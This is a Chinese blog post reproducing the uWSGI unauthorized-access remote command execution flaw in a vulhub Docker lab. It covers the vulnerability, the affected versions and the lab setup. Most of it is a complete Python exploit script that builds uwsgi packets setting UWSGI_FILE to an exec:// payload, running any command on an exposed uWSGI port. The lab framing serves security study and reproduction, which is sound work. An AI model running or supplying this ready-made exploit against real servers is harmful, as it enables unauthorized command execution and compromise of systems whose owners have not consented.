热门标签
热门文章
- 1如何从GitHub上下载开源项目_github下载开源项目
- 2QT:工具栏_qt工具栏
- 3ElasticSearch之索引类型映射文档介绍_elstack的mapping相当于表结构,index相当于什么
- 4PyTorch搭建LSTM实现时间序列预测(负荷预测)_pytorch lstm
- 5Dependency check配置Mysql数据库存储nvd数据_dependency-check9.0.10 nvd update failed: attempte
- 6java全链路追踪、监控-Elastic Apm_apm查看请求者信息
- 7SQLMap 入门到入狱_sqlmap扫描要坐牢吗
- 82024年危险化学品经营单位主要负责人证考试题库及危险化学品经营单位主要负责人试题解析_2024危险化学品经营单位主要负责人考试
- 9开源数据收集引擎 Logstash 讲解和示例讲解_logstash采集跳过异常数据
- 10Hive(10):由筛选两张表相同/不同的数据引出的exists/not exists_hive not exists
当前位置: article > 正文
uWSGI 未授权访问 漏洞复现_uwsgi漏洞
作者:我家小花儿 | 2024-08-06 03:42:40
赞
踩
uwsgi漏洞
一、漏洞描述
uWSGI 是一款 Web 应用程序服务器,它实现了 WSGI、uwsgi 和 http 等协议,并支持通过插件来运行各种语言,通常被用于运行 Python WEB 应用。uWSGI除了是应用容器的名称之外,它和 Fastcgi 之类的一样,也是前端 server 与后端应用容器之间的一个交流标准。目前nginx,apache也支持 uWSGI 协议进行代理转发请求。
uWSGI支持通过魔术变量(Magic Variables)的方式动态配置后端 Web 应用。如果其端口暴露在外,攻击者可以构造 uWSGI 数据包,并指定魔术变量 UWSGI_FILE,运用exec://协议执行任意命令。
二、漏洞影响
uWSGI 1.9及以上(最新2.0.15,报告官方之后,官方在3.0开发版中修复了这个问题,不受到影响)
三、漏洞复现
1、环境搭建
执行如下命令启动nginx+uwsgi环境:
cd vulhub/uwsgi/unacc
docker-compose up -d
- 1
- 2
环境启动后,访问http://x.x.x.x:8080即可查看一个 Web 应用:
2、漏洞复现
其 uWSGI 暴露在8000端口,使用poc.py,执行命令python3 poc.py -u x.x.x.x:8000 -c "touch /tmp/success":
在Docker中查看:
success文件成功被创建。
四、漏洞POC
#!/usr/bin/python # coding: utf-8 import sys import socket import argparse import requests def sz(x): s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0') s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex') return s[::-1] def pack_uwsgi_vars(var): pk = b'' for k, v in var.items() if hasattr(var, 'items') else var: pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8') result = b'\x00' + sz(pk) + b'\x00' + pk return result def parse_addr(addr, default_port=None): port = default_port if isinstance(addr, str): if addr.isdigit(): addr, port = '', addr elif ':' in addr: addr, _, port = addr.partition(':') elif isinstance(addr, (list, tuple, set)): addr, port = addr port = int(port) if port else port return (addr or '127.0.0.1', port) def get_host_from_url(url): if '//' in url: url = url.split('//', 1)[1] host, _, url = url.partition('/') return (host, '/' + url) def fetch_data(uri, payload=None, body=None): if 'http' not in uri: uri = 'http://' + uri s = requests.Session() # s.headers['UWSGI_FILE'] = payload if body: import urlparse body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path)) d = s.post(uri, data=body_d) else: d = s.get(uri) return { 'code': d.status_code, 'text': d.text, 'header': d.headers } def ask_uwsgi(addr_and_port, mode, var, body=''): if mode == 'tcp': s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(parse_addr(addr_and_port)) elif mode == 'unix': s = socket.socket(socket.AF_UNIX) s.connect(addr_and_port) s.send(pack_uwsgi_vars(var) + body.encode('utf8')) response = [] # Actually we dont need the response, it will block if we run any commands. # So I comment all the receiving stuff. # while 1: # data = s.recv(4096) # if not data: # break # response.append(data) s.close() return b''.join(response).decode('utf8') def curl(mode, addr_and_port, payload, target_url): host, uri = get_host_from_url(target_url) path, _, qs = uri.partition('?') if mode == 'http': return fetch_data(addr_and_port+uri, payload) elif mode == 'tcp': host = host or parse_addr(addr_and_port)[0] else: host = addr_and_port var = { 'SERVER_PROTOCOL': 'HTTP/1.1', 'REQUEST_METHOD': 'GET', 'PATH_INFO': path, 'REQUEST_URI': uri, 'QUERY_STRING': qs, 'SERVER_NAME': host, 'HTTP_HOST': host, 'UWSGI_FILE': payload, 'SCRIPT_NAME': target_url } return ask_uwsgi(addr_and_port, mode, var) def main(*args): desc = """ This is a uwsgi client & RCE exploit. Last modifid at 2018-01-30 by wofeiwo@80sec.com """ elog = "Example:uwsgi_exp.py -u 1.2.3.4:5000 -c \"echo 111>/tmp/abc\"" parser = argparse.ArgumentParser(description=desc, epilog=elog) parser.add_argument('-m', '--mode', nargs='?', default='tcp', help='Uwsgi mode: 1. http 2. tcp 3. unix. The default is tcp.', dest='mode', choices=['http', 'tcp', 'unix']) parser.add_argument('-u', '--uwsgi', nargs='?', required=True, help='Uwsgi server: 1.2.3.4:5000 or /tmp/uwsgi.sock', dest='uwsgi_addr') parser.add_argument('-c', '--command', nargs='?', required=True, help='Command: The exploit command you want to execute, must have this.', dest='command') if len(sys.argv) < 2: parser.print_help() return args = parser.parse_args() if args.mode.lower() == "http": print("[-]Currently only tcp/unix method is supported in RCE exploit.") return payload = 'exec://' + args.command + "; echo test" # must have someting in output or the uWSGI crashs. print("[*]Sending payload.") print(curl(args.mode.lower(), args.uwsgi_addr, payload, '/testapp')) if __name__ == '__main__': main()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
五、参考链接
https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi-rce-zh.md
https://github.com/vulhub/vulhub/blob/master/uwsgi/unacc/poc.py
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/935633
推荐阅读
相关标签
